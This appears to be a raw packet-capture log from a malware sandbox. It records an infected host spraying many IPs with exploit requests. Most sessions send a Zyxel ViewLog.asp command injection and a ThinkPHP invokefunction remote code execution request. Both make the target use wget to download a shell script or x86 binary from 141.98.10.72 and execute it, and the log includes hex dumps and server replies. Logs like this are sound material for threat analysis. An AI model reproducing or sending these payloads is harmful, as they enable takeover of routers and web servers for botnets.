                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        329192.168.2.145088494.187.116.258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.494987965 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        330192.168.2.144670085.122.227.1218080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.504766941 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        331192.168.2.145875294.123.248.1848080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.506481886 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        332192.168.2.143971894.123.148.328080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.506688118 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        333192.168.2.144913494.121.47.2268080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.508364916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        334192.168.2.144477094.120.30.1258080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:36.510360956 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        335192.168.2.144901695.164.18.13780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:37.255886078 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:37.449528933 CET307INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:33:37 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        336192.168.2.143403695.101.227.22880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:37.258883953 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:37.456042051 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:37 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:37 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 66 63 38 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 36 31 37 26 23 34 36 3b 33 64 66 30 35 36 65 61 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;6fc8645f&#46;1707899617&#46;3df056ea</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        337192.168.2.144131495.100.55.23080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:37.272130013 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:37.482542992 CET480INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 258
                                                        Expires: Wed, 14 Feb 2024 08:33:37 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:37 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 36 34 66 39 30 61 31 37 26 23 34 36 3b 31 37 30 37 38 39 39 36 31 37 26 23 34 36 3b 31 35 37 30 39 62 66 64 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;64f90a17&#46;1707899617&#46;15709bfd</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        338192.168.2.144102695.101.17.24280
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:37.278163910 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:37.494769096 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:33:37 GMT
                                                        Date: Wed, 14 Feb 2024 08:33:37 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 39 64 37 35 37 62 35 63 26 23 34 36 3b 31 37 30 37 38 39 39 36 31 37 26 23 34 36 3b 36 39 32 36 39 36 35 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;9d757b5c&#46;1707899617&#46;6926965</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        339192.168.2.145907895.58.97.20180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:37.347079039 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:37.632874012 CET29INHTTP/1.1 200 OK
                                                        Feb 14, 2024 09:33:37.632997036 CET515INData Raw: 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68
                                                        Data Ascii: Connection: closePragma: no-cacheCache-Control: no-cacheContent-Type: text/html; charset=utf-8<!DOCTYPE html PUBLIC "-//W3C//Dtd XHTML 1.0 Strict//EN" "http://www.w3.org/tr/xhtml1/Dtd/xhtml1-Transitional.dtd"><html xmlns="http://www


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        340192.168.2.144747895.32.182.10980
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:37.588186026 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:33:37.867466927 CET121INHTTP/1.1 200 OK
                                                        Content-Type:text/html
                                                        Transfer-Encoding:chunked
                                                        X-Frame-Options:SAMEORIGIN
                                                        Connection:Keep-Alive
                                                        Feb 14, 2024 09:33:37.875858068 CET1286INData Raw: 32 38 30 30 0d 0a ef bb bf 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d
                                                        Data Ascii: 2800<html><head><title></title><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><link href="css/login.css?201410302002002984454553184798" media="all" rel="stylesheet" /><link href="css/Style.css?20141030200200
                                                        Feb 14, 2024 09:33:37.875901937 CET1286INData Raw: 61 67 65 20 3d 20 27 27 3b 0d 0a 76 61 72 20 6c 6f 63 6b 6c 65 66 74 74 69 6d 65 72 68 61 6e 64 6c 65 3b 0d 0a 0d 0a 69 66 28 56 61 72 5f 4c 61 73 74 4c 6f 67 69 6e 4c 61 6e 67 20 3d 3d 20 27 27 29 0d 0a 7b 0d 0a 4c 61 6e 67 75 61 67 65 20 3d 20
                                                        Data Ascii: age = '';var locklefttimerhandle;if(Var_LastLoginLang == ''){Language = Var_DefaultLang;}else{Language = Var_LastLoginLang;}document.title = ProductName;function showlefttime(){if(LockLeftTime <= 0){window.l


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        341192.168.2.144190085.10.95.248080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:38.255132914 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:39.328669071 CET136INHTTP/1.1 404 Not Found
                                                        Server: PsiOcppApp
                                                        Connection: keep-alive
                                                        Date:Wed, 14 Feb 2024 8:33:38 GMT
                                                        Content-Length: 0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        342192.168.2.143329031.13.212.368080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:38.461785078 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:38.663618088 CET295INHTTP/1.1 404 Not Found
                                                        Date: Wed, 14 Feb 2024 08:33:38 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 150
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        343192.168.2.143392694.121.181.238080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:38.508028030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        344192.168.2.144927894.121.24.1818080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:38.510049105 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        345192.168.2.143899094.120.212.898080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:38.511017084 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        346192.168.2.144556662.202.159.1518080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:38.662158012 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        347192.168.2.144556831.136.212.1528080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:33:38.666055918 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:39.303653002 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:40.551632881 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:43.143527985 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:33:48.263297081 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
